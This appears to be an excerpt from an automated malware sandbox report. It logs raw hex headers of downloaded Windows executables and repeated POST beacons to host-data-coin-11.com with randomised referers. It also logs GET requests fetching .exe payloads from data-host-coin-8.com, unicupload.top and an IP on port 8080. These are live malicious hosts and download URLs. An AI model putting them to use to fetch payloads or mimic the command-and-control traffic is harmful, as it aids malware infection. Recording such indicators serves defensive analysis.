00 0a 0b 12 01 28 14 00 00 0a 28 15 00 00 0a 00 73 05 00 00 06 0a 06 6f 04 00 00 06 00 28 13 00 00 0a 0b 12 01 28 14 00 00 0a 28 15 00 00 0a 00 16 0c 2b 00 08 2a 22 02 28 16 00 00 0a 00 2a 00 1b 30 06 00 ae 00 00 00 02 00 00 11 00 d0 20 00 00 01 28 17 00 00 0a 72 01 00 00 70 17 8d 14 00 00 01 25 16 d0 22 00 00 01 28 17 00 00 0a a2 28 18 00 00 0a 14 17 8d 10 00 00 01 25 16 20 20 4e 00 00 8c 22 00 00 01 a2 6f 19 00 00 0a 26 00 20 00 0c 00 00 28 1a 00 00 0a 00 00 de 05 26 00 00 de 00 d0 26 00 00 01 28 17 00 00 0a 72 0d 00 00 70 72 35 00 00 70 72 39 00 00 70 28 1b 00 00 0a 17 8d 14 00 00 01 25 16 d0 27 00 00 01 28 17 00 00 0a a2 28 18 00 00 0a 73 1c 00 00 0a 17 8d 10 00 00 01 25 16 72 3b 00 00 70 a2 6f 19 00 00 0a 74 01 00 00 1b 0a 2b 00 06 2a 00 00 01 10 00 00 00 00 42 00 0f 51 00 05 10 00 00 01 1b 30 03 00 37 01 00 00 03 00 00 11 00 02 28 03 00 00 06 0a 06 14 fe 03 13 04 11 04 2c 0b 06 16 06 8e
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Jan 2022 19:30:12 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:58 GMTETag: "61d8c846-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:12 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:30:18 GMTContent-Type: application/x-msdos-programContent-Length: 557664Connection: closeLast-Modified: Thu, 13 Jan 2022 19:20:04 GMTETag: "88260-5d57b92d7ebed"Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d6 ad 35 ab 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 24 03 00 00 2a 03 00 00 00 00 00 00 b0 06 00 00 20 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 08 00 00 04 00 00 1c 40 09 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 03 00 e4 01 00 00 00 80 03 00 50 29 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 69 64 61 74 61 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 70 64 61 74 61 00 00 00 10 00 00 00 70 03 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 29 03 00 00 80 03 00 30 06 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 61 00 00 80 01 00 00 b0 06 00 fc 78 01 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 19:30:21 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 16:06:29 GMTETag: "6ff1c1-5d58cfc604e56"Accept-Ranges: bytesContent-Length: 7336385Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 58 b0 38 63 39 de 6b 63 39 de 6b 63 39 de 6b 77 52 da 6a 68 39 de 6b 77 52 dd 6a 64 39 de 6b 77 52 db 6a df 39 de 6b 05 56 23 6b 67 39 de 6b 31 4c db 6a 45 39 de 6b 31 4c da 6a 72 39 de 6b 31 4c dd 6a 6a 39 de 6b 77 52 df 6a 68 39 de 6b 63 39 df 6b e4 39 de 6b d9 4c da 6a 70 39 de 6b d9 4c dc 6a 62 39 de 6b 52 69 63 68 63 39 de 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 cb 9e e1 61 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d 00 36 02 00 00 54 01 00 00 00 00 00 c8 a8 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 d0 04 00 00 04 00 00 25 0a 70 00 02 00 60 81 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 5b 03 00 78 00 00 00 00 b0 04 00 e3 05 00 00 00 80 04 00 e8 1d 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 48 07 00 00 20 39 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 39 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 50 02 00 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 35 02 00 00 10 00 00 00 36 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 98 18 01 00 00 50 02 00 00 1a 01 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 03 01 00 00 70 03 00 00 0c 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 e8 1d 00 00 00 80 04 00 00 1e 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 f4 00 00 00 00 a0 04 00 00 02 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e3 05 00 00 00 b0 04 00 00 06 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 07 00 00 00 c0 04 00 00 08 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49952 version: TLS 1.0
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pieilmtu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nwilglig.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nfbqltka.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cvdhldsf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qcjatd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 351Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xrovmrlel.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cmgcwqatb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://owgvnnuoml.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://opviax.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nunmqyect.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kyadmhioim.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rnsdjgkq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sjgvu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cqsurm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 324Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gculkm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ifvodd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lvmiyiiy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pegqugok.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uhiqru.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jbinuykf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kybdaip.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://doynnfulb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nxysak.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jxgxnkpb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mfkcxcj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 256Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://codldamrms.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://niaqngu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hmpbvq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ktpvhvj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ovfkbfuk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cgqgnij.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pdjtd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jcppp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fnkfxr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: host-data-coin-11.com
